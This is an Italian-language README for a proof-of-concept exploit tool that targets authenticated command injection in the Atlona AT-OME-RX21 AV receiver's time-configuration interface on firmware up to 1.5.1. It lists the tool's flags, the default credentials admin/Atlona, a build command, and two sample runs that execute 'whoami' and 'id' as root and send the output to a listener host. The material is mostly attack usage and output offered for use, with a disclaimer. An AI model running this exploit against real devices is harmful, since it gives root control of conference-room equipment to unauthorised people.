
Exploit proof-of-concept per l'iniezione di comandi autenticata in Atlona AT-OME-RX21, che consente l'esecuzione di comandi a livello root tramite l'interfaccia di configurazione dell'ora.
Disclaimer: Questo proof of concept è fornito esclusivamente per scopi educativi e di ricerca. Non utilizzare questo codice su sistemi di cui non possiedi o non hai esplicita autorizzazione per testare. Non sono responsabile per qualsiasi uso improprio.
Una vulnerabilità di iniezione di comandi autenticata è presente nell'interfaccia di configurazione dell'ora dello switch AV Atlona AT-OME-RX21. Un utente con credenziali valide può iniettare comandi del sistema operativo che vengono eseguiti come root, portando a un compromesso completo del sistema.
Atlona AT-OME-RX21 è un ricevitore e scaler AV (audio/video) progettato per ambienti professionali di videoconferenza e collaborazione. Viene utilizzato principalmente in sale riunioni, aule e spazi di collaborazione. Aiuta a collegare dispositivi come laptop/sistemi di videoconferenza ai display.
Questo PoC funziona su tutte le versioni firmware <= 1.5.1
info del produttore: https://atlona.com/product/at-ome-rx21/
$ .\cve-2024-30167.exe -h
▄█████ ██ ██ ██████ ████▄ ▄██▄ ████▄ ██ ██ ████▄ ▄██▄ ▄██ ▄██▀▀▀ ██████
██ ██▄▄██ ██▄▄ ▄▄▄ ▄██▀ ██ ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██ ██ ██ ██▄▄▄ ▄██▀
▀█████ ▀██▀ ██▄▄▄▄ ███▄▄ ▀██▀ ███▄▄ ██ ▄▄▄█▀ ▀██▀ ██ ▀█▄▄█▀ ██▀
PoC by: github.com/RIZZZIOM
Utilizzo di cve-2024-30167.exe:
-P string
porta di ascolto per l'output dei comandi (default "4444")
-c string
Comando da eseguire sul target
-l string
host di ascolto per l'output dei comandi
-p string
Password per l'autenticazione (default "Atlona")
-t string
URL del target (es: http://example.com)
-u string
Nome utente per l'autenticazione (default "admin")
go build -o <OUTPUT_FILENAME>
$ .\cve-2024-30167.exe -P 8000 -c 'whoami' -l 192.168.1.100 -t http://192.168.1.103:1337
▄█████ ██ ██ ██████ ████▄ ▄██▄ ████▄ ██ ██ ████▄ ▄██▄ ▄██ ▄██▀▀▀ ██████
██ ██▄▄██ ██▄▄ ▄▄▄ ▄██▀ ██ ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██ ██ ██ ██▄▄▄ ▄██▀
▀█████ ▀██▀ ██▄▄▄▄ ███▄▄ ▀██▀ ███▄▄ ██ ▄▄▄█▀ ▀██▀ ██ ▀█▄▄█▀ ██▀
PoC by: github.com/RIZZZIOM
Listening on 192.168.1.100:8000 for response...
Command Injection Successful
=====Received Response=====
root
$ .\cve-2024-30167.exe -P 8000 -c 'id' -l 192.168.1.100 -t http://192.168.1.103:1337
▄█████ ██ ██ ██████ ████▄ ▄██▄ ████▄ ██ ██ ████▄ ▄██▄ ▄██ ▄██▀▀▀ ██████
██ ██▄▄██ ██▄▄ ▄▄▄ ▄██▀ ██ ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██ ██ ██ ██▄▄▄ ▄██▀
▀█████ ▀██▀ ██▄▄▄▄ ███▄▄ ▀██▀ ███▄▄ ██ ▄▄▄█▀ ▀██▀ ██ ▀█▄▄█▀ ██▀
PoC by: github.com/RIZZZIOM
Listening on 192.168.1.100:8000 for response...
Command Injection Successful
=====Received Response=====
uid=0(root) gid=0(root) groups=0(root)
il comando precedente utilizza le credenziali predefinite per accedere al dispositivo.
SINTASSI:
.\cve=2024-30167.exe -P <listening_port> -c <command> -l <listener_host> -t <target_uri> -u <username> -p <password>